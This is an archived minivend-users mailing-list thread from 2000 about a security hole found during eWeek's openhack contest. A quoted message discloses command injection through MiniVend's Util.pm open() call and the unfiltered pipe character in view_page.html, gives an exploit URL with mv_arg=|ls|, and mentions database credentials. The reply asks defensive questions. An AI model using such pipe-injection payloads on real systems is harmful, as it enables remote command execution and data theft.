Akopia Akopia Services
[Date Prev][Date Next][Thread Prev][Thread Next][Minivend by date ][Minivend by thread ]

RE: HACKED [mv] eWeek using Minivend in our openhack project

******    message to minivend-users from "Cameron B. Prince" <cbp@InternetExpertsLLC.com>     ******

I have duplicated this with a test v4.04 simple catalog.

I had not taken the time to explore the view_page.html file when I converted
my primary catalog from v3.14 to v4.04 so I removed it originally.

My questions to you all are:

1) It seems to be a problem that is specific to this default page. Can
someone confirm this?
2) Does this bug in util.pm open MiniVend to attacks in other functions?
3) Can we safeguard our catalogs by simply removing the file?
4) Are there other functions that rely on this page? I could find none when
I converted to v4.04 and I seen none since.

I was pleased to hear of this contest because security is or should be a
major concern for all of us.

I hope Tim and the others will fix this hole and reset the counter so that
more can be sought.

Thanks for your dedication.


Cameron


-----Original Message-----
From: owner-minivend-users@minivend.com
[mailto:owner-minivend-users@minivend.com]On Behalf Of Alexander Lazic
Sent: Monday, July 03, 2000 3:33 AM
To: henry_baltazar@ziffdavis.com; timothy_dyck@ziffdavis.com
Cc: minivend-users@minivend.com; Timothy Dyck
Subject: Re: HACKED [mv] eWeek using Minivend in our openhack project

******    message to minivend-users from Alexander Lazic <all@gmx.at>
******

hi,

> Since we are paying money if anyone can crack into the store ($1,500),
> it's possible that someone is going to go through the code looking for
> ways to exploit any holes. Other than the advice in the FAQ on "Is
> MiniVend secure" and in the "MiniVend Security" section of the manual,
are
> there any other security tips people can provide to keep our site locked
> down? Thanks very much.

there is a sec. hole in the minivend Util.pm - module

routine readfile at line 810:

--cut here---
return undef if ! open(READIN, $file);
--cut here---

... minivend file view_page.html:

---cut here---
[elsif session arg =~ /^\/|\.\./]
---cut here---

does no proper input validation checks (they forgot about the "|" :)

these two problems do allow http-request like:

https://www.openhack.com/cgi-bin/eweekorcl/view_page.html?mv_arg=|ls|

so anybody can execute "any" command with minivend`s permissions ..

/* with the ORACLE_USERID=minivend/hugepassword@orcl and sqlplus it should
be easy to execute queries on the oracle database
 .. unfortunately the user minivend is not allowed to set
environment-variables .. due to lack of time we were not able to h
ave a closer look at this ... */

thats all

almei

--
Sent through GMX FreeMail - http://www.gmx.net

-
To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to
Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list

-
To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list
Search for: Match: Format: Sort by: